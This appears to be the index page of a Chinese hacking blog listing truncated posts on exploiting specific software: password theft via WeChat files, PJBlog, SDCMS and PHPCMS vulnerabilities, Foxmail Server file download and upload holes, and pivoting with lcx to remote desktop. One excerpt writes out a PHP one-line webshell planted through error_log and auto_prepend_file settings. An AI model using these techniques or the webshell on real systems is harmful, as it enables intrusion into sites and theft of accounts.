WebShell'S Blog

QQ微信暴QQ密码。。。先扯蛋下。。由于昨天才从长沙回。。今天回到家，就一个字爽。。所以今天心情非常的好。。就说一下上个星期发现微信可以暴QQ密码。。由于买了个手机。所以蛋疼的下了个微信。。结果玩着玩着。。发现了oday。。下面开始说说怎么搞吧。。。 第一：首先用数据线连接到你手机上。然后打开你的e盘。。就是你安装微信在那个盘里。。我是安装在e盘。 第二 ：在e盘找到MM文件夹。（这个MM是微信安...

- 阅读全文 -

PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术   在文件Action.asp中： ElseIf Request.QueryString(“action”) = “updatepassto” Then //第307行 If ChkPost() Then Dim e_Pass, e_RePass, e_...

- 阅读全文 -

上图上工具： 图一 图二 图三 这种情况不知道什么原因 重新输入一遍又可以进入后台了! 图四 这样直接进入后台了。。。。 是不是很傻瓜 关键词：Powered By SDCMS 利用环境：windows xp 下载：sdcms1.3

- 阅读全文 -

作者：T00LS 鬼哥 漏洞文件：后台目录/index.asp 作者声明：转载请注明 T00ls 鬼哥 Sub Check Dim username,password,code,getcode,Rs IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub username=FilterText(Trim(Request.Form("username")),1)...

- 阅读全文 -

1.把error_log设置到web目录 ~例如hackxl.php 2.auto_prepend_file设为一句话 ~比如设为<?php eval($_REQUEST[#]);?> 3.然后访问任意php php文件后会因为找不到auto_prepend_file的文件而报错,而会产生报错；把<?php eval($_REQUEST[#]);?>写入了hackxl.ph...

- 阅读全文 -

Foxmail Server是专为国人设计的邮件服务器软件,提供多种邮件服务， 用户可以用Foxmail、Outlook等客户端软件收发邮件， 也可以在美观易用的中文Web界面上登陆处理邮件。 user/download.asp存在任意文件下载漏洞 user/filesMain.asp?fmFileType=image文件上传漏洞 由于文件上传到的目录是虚拟目录,所以不可以执行。 但是我们通过上传...

- 阅读全文 -

8098是web GUI的端口。 看到了吗？ 是用IE打开的终端。你有啥想法？嘿嘿。不过这个方法有个弊病，就是太明显。 下面是架设步骤 1 运行appwiz.cpl 添加/删除windows组件 IIS中看到这样就架设好了，   上图中的msrdp.cab是远程登录的必须用的文件。 最后在地址栏里访问图1的标题就行了。 别忘了这个还可以改端口。 最后说一下，这个远程登录比较鸡肋。国内没人...

- 阅读全文 -

今晚在搞个黑客站的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！ Set ObjS...

- 阅读全文 -

作者：CmdH4ck http://hi.baidu.com/cmdh4ck 鄙视转载不声明版权的！ 前几天拿到一个站的shell，windows2000系统，提权成功，3389没开，打开3389，待服务器重启之后，lcx转发，3389登陆 进入服务器后发现同C段只有一台主机192.168.0.50     于是就感觉奇怪，怎么说这个拿的这个站的单位也是小有规模的，怎么就一台呢...

- 阅读全文 -

# #Author : HeXie S3curity TeAm #Date : 2011.10.01 # #FIle : /image.php <?php /* *######################################### * PHPCMS File Manager * Copyright (c) 2004-2006 phpcms.cn * Author: Longb...

- 阅读全文 -